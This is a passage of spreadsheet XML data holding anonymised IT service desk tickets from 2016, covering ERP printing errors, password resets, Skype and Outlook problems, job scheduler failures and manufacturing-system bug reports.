    <s v="circuit outage : switzerland dmvpn-2821-rtr01 is down since 11:38 pm et on 09/26."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __________11:38 pm et on 09/26.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no____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na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hr_tool-etime ç³»ç»Ÿä¸èƒ½ç™»å½•ï¼Œä¸€ç›´æ˜¾ç¤ºæ­£åœ¨åŠ è½½åº”ç”¨æ•°æ®åº“"/>
    <s v="hr_tool-etime ç³»ç»Ÿä¸èƒ½ç™»å½•ï¼Œä¸€ç›´æ˜¾ç¤ºæ­£åœ¨åŠ è½½åº”ç”¨æ•°æ®åº“"/>
    <s v="qekyowtv qdjixvkh"/>
    <x v="31"/>
  </r>
  <r>
    <s v="erp system - very slow response_apac"/>
    <s v="we've faced the problem of erp system which is very slow response time. please help check and fixing this issue to make erp system more faster speed. "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_212 : /dev/u00lv is over  20% space consumed. space available: 28.3 g"/>
    <s v="HostName_212 : /dev/u00lv is over  20% space consumed. space available: 28.3 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to browse &quot;hr_tool&quot; site."/>
    <s v="unable to browse &quot;hr_tool&quot; site. snapshot of error is attached."/>
    <s v="cpnqvlfk imjucnes"/>
    <x v="0"/>
  </r>
  <r>
    <s v="é‚®ç®±æ— æ³•å¯åŠ¨"/>
    <s v="é‚®ç®±æ— æ³•å¯åŠ¨ï¼Œæç¤ºæ— æ³•åˆ›æ–°æ–°çš„å †æ ˆé˜²æŠ¤é¡µé¢ã€‚"/>
    <s v="bzypjigs qokwvgyn"/>
    <x v="30"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 09/26/2016 22:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 09/26/2016 22:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="crm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hmjdrvpb.komuaywn@gmail.com_x000d__x000a__x000d__x000a_good day,_x000d__x000a__x000d__x000a_can you please advise whether crm is going through updates at the moment?_x000d__x000a__x000d__x000a_there are a number of issues concerning us in 1301:_x000d__x000a__x000d__x000a__x000d__x000a_1.       at the moment we cannot access crm at all._x000d__x000a__x000d__x000a_2.       yesterday, i could not enter new customer accounts as my drop down boxes were not fully loading and thus, i could only see one or two items to select from._x000d__x000a__x000d__x000a_3.       the team here in australia advised that lately that they have had to contact customer master on numerous occasions as there are certain entries in crm, new customer accounts, that are not transferring to erp like:_x000d__x000a_sales reps_x000d__x000a_carriers_x000d__x000a_etc_x000d__x000a__x000d__x000a_we were advised by our finance department that they believed it were aware of such problems above?_x000d__x000a__x000d__x000a_kind "/>
    <s v="hmjdrvpb komuaywn"/>
    <x v="14"/>
  </r>
  <r>
    <s v="job bkwin_HostName_768_inc failed in job_scheduler at: 09/26/2016 22:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_768_inc failed in job_scheduler at: 09/26/2016 22:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp slow"/>
    <s v="apac china, apac dc &amp; company colleagues said the erp is very slow. i ping erp address 81.93.78.714, 50% packet loss."/>
    <s v="bqdyhnoj rwyvsfgn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/26/2016 22:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/26/2016 22:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="purchasing order export issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jrdafplx.fcnjmvts@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_when i export the po files to pdf format in erp by command zz_mails , sometimes , it's show the other language rather than chinese ,so how can i solve it?_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01SID_358a8.5c6486b0]_x000d__x000a__x000d__x000a_with best "/>
    <s v="jrdafplx fcnjmvts"/>
    <x v="29"/>
  </r>
  <r>
    <s v="password reset via password_manager_tool password manager"/>
    <s v="password reset via password_manager_tool password manager"/>
    <s v="fsvnjexu yxaevupi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not working and unable to receive emails."/>
    <s v="outlook not working and unable to receive emails."/>
    <s v="pvbomqht smfkuhwi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool-new customer"/>
    <s v="_x000d__x000a__x000d__x000a_received from: skmdgnuh.utgclesd@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_not able to add new customer in engineering_tool, kindly support to solve the error._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35883.6872ebb0]_x000d__x000a__x000d__x000a_with warm "/>
    <s v="skmdgnuh utgclesd"/>
    <x v="25"/>
  </r>
  <r>
    <s v="msd: outlook not showing the crm add-in."/>
    <s v="msd: outlook not showing the crm add-in._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-deleted and reconfigured the user profile on crm._x000d__x000a_-launched outlook._x000d__x000a_-user confirmed by closing and relaunching outlook everything is fine now._x000d__x000a_-issue resolved._x000d__x000a__x000d__x000a_"/>
    <s v="ohnimgtv nmqyuolh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn access status check"/>
    <s v="vpn access status check"/>
    <s v="HdOuWxAt qfKdlJMx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot find dr. cyxieuwk rekwlqmu in ticketing_tool"/>
    <s v="i tried to add cyxieuwk.rekwlqmu@gmail.com to the watch list on a ticket but i couldn't find him in ticketing_tool._x000d__x000a_please active christgrytoph's account in ticketing_tool."/>
    <s v="fyuqhlcx fjiuhxae"/>
    <x v="0"/>
  </r>
  <r>
    <s v="alrthyu s lowe. my ee# is 6045304.it needs to show under me in the financial report that mikhghytr robhyertyjs receives from nicrhty pi"/>
    <s v="from: scthyott lortwe _x000a_sent: monday, september 26, 2016 8:42 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: trup[ti fw: recode acct_x000a_importance: high_x000a__x000a_it team_x000a__x000a_please see the email chain below. please assign this to me, alrthyu s lowe. my ee# is 6045304._x000a__x000a_it needs to show under me in the financial report that mikhghytr robhyertyjs receives from nicrhty piper._x000a__x000a_scthyott lortwe_x000a_sales manager â€“ southeast _x000a_industrial segment_x000a_sbvlxuwm.yanbikrx@gmail.com_x000a__x000a_from: christgry financial_toolher _x000a_sent: monday, september 26, 2016 9:30 am_x000a_to: mikhghytr robhyertyjs &lt;sgblhypi.htqmidsn@gmail.com&gt;; scthyott lortwe &lt;sbvlxuwm.yanbikrx@gmail.com&gt;_x000a_subject: re: recode acct_x000a__x000a_hi mikhghytr â€“ that is not an account in erp. it is new customer quota that was loaded into financial reporting per the direction of cpmaidhj elbaqmtp. unfortunately, you will need to submit an it ticket to have it reassigned. _x000a__x000a_kindest "/>
    <s v="sbvlxuwm yanbikrx"/>
    <x v="8"/>
  </r>
  <r>
    <s v="expense report issue : getting alert in expense report. screenshots attached."/>
    <s v="expense report issue _x000d__x000a__x000d__x000a_please change cost center for user "/>
    <s v="fjciqgav ybkqvazh"/>
    <x v="9"/>
  </r>
  <r>
    <s v="outlook language is changing automatically."/>
    <s v="outlook language is changing automatically._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-changed the launguage settings as english default._x000d__x000a_-restarted the pc._x000d__x000a_-advised the user to check now._x000d__x000a_-user confirmed that the outlook language is now english._x000d__x000a_-educated the user about the steps to take to change the outlook launguage._x000d__x000a_-issue resolved."/>
    <s v="jborwynt gidxbfrq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="mobile device activation"/>
    <s v="tyuhfljp zyjfpgtk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="load telephony_software onto users pc"/>
    <s v="load telephony_software onto users pc"/>
    <s v="wrqxmfan fsizndjb"/>
    <x v="6"/>
  </r>
  <r>
    <s v="no audio while on skype call"/>
    <s v="no audio while on skype call"/>
    <s v="ibsywxpc icxhsbfv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with erp login the server list is not available."/>
    <s v="problem with erp login the server list is not available."/>
    <s v="iorecadj crtmqdjg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i am not able to upload engineering_tool, see below screen shot."/>
    <s v="i am not able to upload engineering_tool, see below screen shot."/>
    <s v="zidcxslw clyfdaki"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login to windows"/>
    <s v="not able to login to windows"/>
    <s v="bwisgahv phqmgouw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user unable to login to the telephony_software ."/>
    <s v="user unable to login to the telephony_software ._x000a_-user unable to login to the interaction client._x000a_-user getting authenication error._x000a_-contact: "/>
    <s v="unzfykar osxmbhav"/>
    <x v="6"/>
  </r>
  <r>
    <s v="compensation system is missing september inwarehouse_tools "/>
    <s v="the compensation system is missing september inwarehouse_tools, which is impacting sales compensation reports for all of north amerirtca field sales. please assign to bw team and consult zarthyc mithycs for resolution."/>
    <s v="aofextgk tugywidl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="ockwafib.wftboqry@gmail.com called to service desk to check status of pomjgvte.goswvnci@gmail.com"/>
    <s v="ockwafib.wftboqry@gmail.com called to service desk to check status of pomjgvte.goswvnci@gmail.com for account activation._x000d__x000a__x000d__x000a_"/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cÃ³pia de conta telefonica"/>
    <s v="solicito fornecer cÃ³pia da conta telefÃ´nica do celular do perÃ­odo de 20 de junho a 20 de setembro/2016"/>
    <s v="dughqrnf mebofqhz"/>
    <x v="62"/>
  </r>
  <r>
    <s v="confirmation qty window not deducting confirmed pieces in default qty field"/>
    <s v="as per my understanding, mii should subtract already confirmed pieces from order planned quantity from confirmation screen whenever user is confirming something. _x000d__x000a_for ex. for a 1000 piece order, if user confirms 400 pieces, the next user or same user next time when confirms that operation, the default qty presented should be 600 but i'm noticing its presenting the original 1000"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="rzonkfua yidvloun was unable to login to windows and outlook"/>
    <s v="rzonkfua yidvloun was unable to login to windows and outlook"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="partial confirmation info sent to erp but machine status behaving differently (usa)"/>
    <s v="usa go-live week. issue reported on 9/21_x000d__x000a__x000d__x000a_order #226038501 _x000d__x000a_op # 0030 _x000d__x000a_work center # 73122161_x000d__x000a__x000d__x000a_operation was in prir status [9/2sartlgeo lhqksbdx2.33 pm] but mii won't allow to resume run. _x000d__x000a_gergryth changed status in mii from prst to prir, it changed status in to-di list but not in machine summary_x000d__x000a__x000d__x000a_start process = 9/20 19.43 = 7.43 pm_x000d__x000a_current time = 9/2sartlgeo lhqksbdx2.50 pm_x000d__x000a_time elapsed ~17 hours and that's what we're seeing on machine summary dashbankrd meaning mii did send partial confirmation information to erp but didn't used the same information for machine status view etc. _x000d__x000a__x000d__x000a_so, in summary, the partial confirmation information made it to erp perfectly fine but the machine status windows wasn't updated with partial confirmation pause and behaved as if partial confirmation pause never happened_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_example from usa_x000d__x000a_for usa location and order 226033677, operation 10_x000d__x000a__x000d__x000a_mii showed the order in prpf status, looking at erp, order was partially confirmed followed by &quot;automatic pause&quot;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_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="unable to print purchase orders from erp"/>
    <s v="unable to print purchase orders from erp"/>
    <s v="sprzgqyv uxpjtgaw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="entered &quot;data maintenance&quot; window using operators credential (usa)"/>
    <s v="during usa go-live week on 9/22 i was able to get into data maintenance on operator pc using operator id.. exact steps listed below_x000a_1. operator had operator dashbankrd open on his pc_x000a_2. he asked for help and todfrm brgyake (plant manager), zcudbnyq rdxzgpej (manufacturing manager) and i stopped by operators desk_x000a_3. his question required to get into &quot;data maintenance&quot; and confirm something (original question was about interrupt codes)_x000a_4. i opened a new &quot;tab&quot;, right next to operator dashbankrd and typed url of data maintenance_x000a_5. then i went into operator dashbankrd tab and clicked log out (i was expecting to enter my own credentials to get into data maintenance)_x000a_6. but some thing weird happened, the moment i switched to data maintenance tab, i realized i was already logged in, without entering my id_x000a_7. i double checked with tom and davidthd that if i was maybe dreaming and entered my credentials but they confirmed, application took me to home screen of data maintenance without asking credentials _x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="the kÃ¼ndigung action for pfgia scgtitt has completed."/>
    <s v="hello , _x000a__x000a_a kÃ¼ndigung for pfgia scgtitt, 1156212249, effective 22.07.2016 has been approved. _x000a_"/>
    <s v="vmthcrkf iceyusnd"/>
    <x v="19"/>
  </r>
  <r>
    <s v="mii logging in under different user"/>
    <s v="issue reported from usa, usa and usa_x000a__x000a_note from erin _x000a_&quot;we have a new issue today â€“ in the osterwalder bank the operators are signing in as themselves and being logged in under other usernames. in the attached screen shot edclhpkf ahjklpxm signed in with her login mcelrnr but was logged in as sanddry mcgfrtann (mcgatnsl). this is a new change â€“ previously it would log in the lauacyltoe hxgaycze person when you would open the window but now it's not even signing in the correct person.&quot;"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="ie 10 needed for finance_app."/>
    <s v="ie 10 needed for finance_app._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-uninstalled ie11 and reinstalled the ie10._x000d__x000a_-user confirmed he was able to login to the finance_app._x000d__x000a_-issue resolved."/>
    <s v="aymgdoqt eoxphqas"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset "/>
    <s v="erp SID_34 password reset "/>
    <s v="uojdnrvs amchenrg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="insbceoa czgpyrtb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the driver was not loaded properly. :  inc1554925 "/>
    <s v="_x000a_summary:hello,_x000a_i can't log in my pc due to updating of intel.the driver was not loaded properly."/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="partner rtr team - email restrictions "/>
    <s v="_x000a__x000a_received from: ntsowaem.jfgslyde@gmail.com_x000a__x000a_would like some assistance on trying to change the email access as approved below for our partner team._x000a__x000a_ergtyic wrtyvis_x000a_manager, internal audit_x000a_ntsowaem.jfgslyde@gmail.com&lt;mailto:ntsowaem.jfgslyde@gmail.com&gt;_x000a__x000a__x000a_from: pal, sadipta [mailto:sadipta.pal@partner.com]_x000a_sent: monday, september 26, 2016 11:57 am_x000a_to: ntsowaem jfgslyde &lt;ntsowaem.jfgslyde@gmail.com&lt;mailto:ntsowaem.jfgslyde@gmail.com&gt;&gt;_x000a_subject: fw: partner rtr team - email restrictions_x000a__x000a_hi erirtc â€“ do you think sonia will be able to expedite this?_x000a__x000a_"/>
    <s v="ntsowaem jfgslyde"/>
    <x v="26"/>
  </r>
  <r>
    <s v="documents folder is missing"/>
    <s v="documents folder is missing. "/>
    <s v="xekdljqh cuqbgtlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to dg05 printer "/>
    <s v="unable to connect to dg05 printer "/>
    <s v="zylaexnv pvkzbduh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0439545"/>
    <s v="ticket update on ticket_no0439545"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print erp orders"/>
    <s v="unable to print erp orders"/>
    <s v="esqcuwbg gdcuhzqw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to wifi"/>
    <s v="unable to connect to wifi"/>
    <s v="ypetnhio ouhlpvig"/>
    <x v="0"/>
  </r>
  <r>
    <s v="7350: unable to hear audio on skype"/>
    <s v="7350: unable to hear audio on skype"/>
    <s v="eqxakzyi cwfrjitq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay:"/>
    <s v="when converting planned orders to production orders and releasing to print -- or just attempting to print anything from erp -- i am getting the following error message: connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay: error when opening an rfc connection (cpic-call: (1)."/>
    <s v="znxcupyi bhrwyxgu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype issue login issue "/>
    <s v="skype issue login issue "/>
    <s v="gbirhjat fptbrhwv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool etime query "/>
    <s v="hr_tool etime query "/>
    <s v="efulzico epgfbhmt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for cyvdluja oxrkfpbz on other / telephony_software"/>
    <s v="reset the password for cyvdluja oxrkfpbz on other / telephony_software"/>
    <s v="cyvdluja oxrkfpbz"/>
    <x v="6"/>
  </r>
  <r>
    <s v="unable to open outlook "/>
    <s v="unable to open outlook "/>
    <s v="mnsejpby xsrdtvkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="information pushed out of bar in machine status display"/>
    <s v="in machine status window, the active hours of operation are displayed. in one instance hours were pushed out of bar making information unreadable (instead of showing 3.433 h, it appears as 433 h) adding pitcure"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="invlaid order number (usa)"/>
    <s v="we see order 2105783 in mii, which infact is material number.. need to know how this was entered as production order # in dashbankrd"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="&quot;work center allowed % difference&quot; message showing up when threshold set to 100%"/>
    <s v="when &quot;confirm. qty. threshold&quot; is set to 100%, system presents a warning even when we confirm planned order qty (which is exactly 100% of planned order qty)_x000d__x000a_"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="re: sent from snipping tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tfesaxip.cvorpnth@gmail.com_x000d__x000a__x000d__x000a_help for work order 226048099._x000d__x000a__x000d__x000a_"/>
    <s v="tfesaxip cvorpnth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sent from snipping tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tfesaxip.cvorpnth@gmail.com_x000d__x000a__x000d__x000a_help for work ord_x000d__x000a__x000d__x000a_"/>
    <s v="tfesaxip cvorpnth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to ess"/>
    <s v="unable to login to ess"/>
    <s v="hduzwpio wrcgunso"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: znxcupyi.bhrwyxgu@gmail.com_x000d__x000a__x000d__x000a_when converting planned orders to production orders and releasing to print, i am getting the following error message:_x000d__x000a_[cid:image001.png@01SID_357e3.677aecd0]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="znxcupyi bhrwyxgu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype issue : personal certificate error."/>
    <s v="_x000a_summary:i am unable to sign into skype - getting pop up message saying there is problem with a certificate.  any suggestions?"/>
    <s v="grtaoivq dwjvfkqe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3032 failed in job_scheduler at: 09/26/2016 10:41:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3032 failed in job_scheduler at: 09/26/2016 10:41:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="13"/>
  </r>
  <r>
    <s v="assign to plm - cannot print work orders due to plsseald connection"/>
    <s v="connection to system production_order_interface_app with destination  production_order_interface_vendor-connc is not okay: "/>
    <s v="utebfkyi vlzaneuj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wrong &quot;stock status&quot; symbols displayed in distributor_tool / companycenter (see attached email)"/>
    <s v="wrong &quot;stock status&quot; symbols displayed in distributor_tool / companycenter (see attached email)"/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="20"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="high priority: gofmxlun kxcfrobq is getting errors in erp when she tries to create and order.  this is her main function and she is unable to proceed creating orders._x000a__x000a_note from micthle follows_x000a_------------------------------------------_x000a_i'm receiving a server error when trying to create production orders in erp.  the error message says &quot;connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay: error when opening an rfc conneciton (cpic-call:1(1). _x000a_--------------------------------------------_x000a__x000a_system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):_x000a_SID_34_x000a__x000a_enter user id of user having the issue:_x000a_letyenm_x000a__x000a_transaction code(s) the user needs or was working with:_x000a_co01_x000a__x000a_describe the issue:_x000a_see message above from micthle_x000a_"/>
    <s v="rxuobtjg grcmqaxd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="pair formation error for orders which have right information / status in erp (usa)"/>
    <s v="order 226047825, operation 40_x000d__x000a_operator unable to &quot;final&quot; confirm the order using time event. gergryth looked up confirmation details in erp and everything looks correct. mii is throwing out &quot;pair formation&quot; error"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="able to start a confirmed job in mii (usa)"/>
    <s v="for order 226044182, operation 0015, we &quot;final confirmed&quot; job in mii but operator was able to &quot;start&quot; the job again - should've not happened as per logic we have defined"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="unable to  get production order to print"/>
    <s v="error reads_x000d__x000a_connection to system production_order_interface_app with destination_x000d__x000a_production_order_interface_vendor-connc is not okay:_x000d__x000a_error when opening an rfc connection (cpic-call: '"/>
    <s v="xplwmiyr pifoldxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp printing issue : connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay."/>
    <s v="erp printing issue : connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay._x000a_error when opening an rfc connection _x000a_contact : "/>
    <s v="acmglkti cwgxrabu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp production order printing issue : connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay."/>
    <s v="erp printing issue : connection to system production_order_interface_app with destination production_order_interface_vendor-connc is not okay._x000a_error when opening an rfc connection _x000a_contact # :_x000a_ext 115"/>
    <s v="bdeplqyj fewovrcq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access needed for vrtybundj to ticketing_tool"/>
    <s v="please usa ycimqxdn wtubpdsz (vrtybundj) access to ticketing_tool  to view tickets similar to what pwc is usaed each year._x000a__x000a_let me know if you have any questions._x000a__x000a_"/>
    <s v="wqxzleky uwjchqor"/>
    <x v="35"/>
  </r>
  <r>
    <s v="crm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: saqbgcpl.ybfzcjiq@gmail.com_x000d__x000a__x000d__x000a_good morning_x000d__x000a__x000d__x000a_i need help assigning an account in crm.  the account was assigned to me by another se but the account has since been reassigned.  i am unable to reassign the account since i am not the primary sales._x000d__x000a_"/>
    <s v="saqbgcpl ybfzcjiq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client login issue"/>
    <s v="business_client login issue"/>
    <s v="unrbafjx reyshakw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp is not letting me print orders message no. /dvsrepro/zrfc016"/>
    <s v=",message no. /dvsrepro/zrfc016_x000a__x000a_"/>
    <s v="qbevnaot shrqicog"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email information"/>
    <s v="from: kthvr sertce _x000a_sent: monday, september 26, 2016 6:31 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: rjodlbcf uorcpftk; zdcheloy aevzsogn_x000a_subject: amar fw: traversecity.service@company.com, important account information_x000a__x000a_hi it,_x000a__x000a_please investigate if this is accurate or spam._x000a__x000a_traversecity.service@company.com  is an older email address for our usa customer service email box. it is listed on older literature that is still being used by customers.  we should keep it in operation.  please confirm._x000a__x000a__x000a_"/>
    <s v="tjlgzkbp iervwjzg"/>
    <x v="26"/>
  </r>
  <r>
    <s v="expense report is blocked"/>
    <s v="expense report is blocked"/>
    <s v="vtrwyeku gisxlqvt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="personal certificate error : skype issue "/>
    <s v="personal certificate error : skype issue "/>
    <s v="hduzwpio wrcgunso"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print production orders on erp printer bd24 "/>
    <s v="unable to print production orders on erp printer bd24"/>
    <s v="skrxopnw zjasxphv"/>
    <x v="13"/>
  </r>
  <r>
    <s v="exporting contacts from outlook "/>
    <s v="exporting contacts from outlook "/>
    <s v="rwhavckz drvxyihj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype is not opening."/>
    <s v="skype is not opening."/>
    <s v="pdvjanwx oprdiygs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reinstall EU_tool \ewew8323851 \wrcktgbd wzrgyunp"/>
    <s v="reinstall EU_tool \ewew8323851 \wrcktgbd wzrgyunp"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="sales doc 35900112/000010 still shows as open in the backorder database."/>
    <s v="sales doc 35900112/000010 still shows as open in the backorder database.  sales doc has been pgid yet it still shows as open in the backorder database.  rpbdvgoy hxasnzjc suggested i enter a ticket.  according to aobrelcs suchytro this sales doc still looks open._x000d__x000a_"/>
    <s v="xkmvpaei fizqoprk"/>
    <x v="12"/>
  </r>
  <r>
    <s v="windows and erp account locked"/>
    <s v="windows and erp account locked"/>
    <s v="vyjmlain hvjbmdgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call / loud noise / gso"/>
    <s v="blank call / loud noise / gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype is &quot;not responding&quot; when trying to do an on line meeting (screen share)."/>
    <s v="attachment shows skype version, etc._x000a__x000a_i am not able to join any skype meeting at this time due to this problem._x000a__x000a_dvzgjsom ynpxqjlf_x000a_company usa facility_x000a__x000a_"/>
    <s v="dvzgjsom ynpxqjlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset help from password_management_tool password manager."/>
    <s v="password reset help from password_management_tool password manager."/>
    <s v="rwhavckz drvxyihj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open hr_engineering_tool for hours--controller access"/>
    <s v="_x000a__x000a_received from: umzcxfah.aoshpjiu@gmail.com_x000a__x000a_umzcxfah aoshpjiu_x000a_plant controller, us_plant_x000a_umzcxfah.aoshpjiu@gmail.com_x000a__x000a__x000a__x000a_"/>
    <s v="umzcxfah aoshpjiu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="yvfrgiba kezghiqa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="compatibility view settings"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tdkfuobm.qrtmaxos@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_i keep receiving this error and have to close out of internet explorer each time.  when i re-open ie the website/database needs to be re-added to the compatibility view settings page.   this has happened to several other people in the ip department._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_357d7.2a03b820]_x000d__x000a__x000d__x000a_[cid:image002.jpg@01SID_357d7.2a03b820]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="tdkfuobm qrtmaxos"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request for erp prtgghj4k &amp; SID_67"/>
    <s v="unable to login to hr_tool erp systems."/>
    <s v="pbhmwqtz wqlbudjx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="archivierung von e-mails"/>
    <s v="_x000a__x000a_received from: anivdcor.rbmfhiox@gmail.com_x000a__x000a_[cid:image003.jpg@01SID_35804.fbc60480]_x000a__x000a_hallo it,_x000a__x000a_ich archiviere meine mails in einer ordnerstruktur._x000a_leider finde ich immer wieder ordner, die plÃ¶tzlich keinen inhalt mehr haben_x000a_was lÃ¤uft hier falsch?_x000a__x000a_gruÃŸ_x000a_achim_x000a__x000a_anivdcor rbmfhiox_x000a_sales manager_x000a_sales germany_x000a__x000a_anivdcor.rbmfhiox@gmail.com&lt;mailto:anivdcor.rbmfhiox@gmail.com&gt;_x000a__x000a__x000a_company deutschland gmbh_x000a_geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, phvkowml azbtkqwx, naruedlk mpvhakdq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anivdcor rbmfhiox"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="tfbpzgcr ztqkbuic"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm online issue "/>
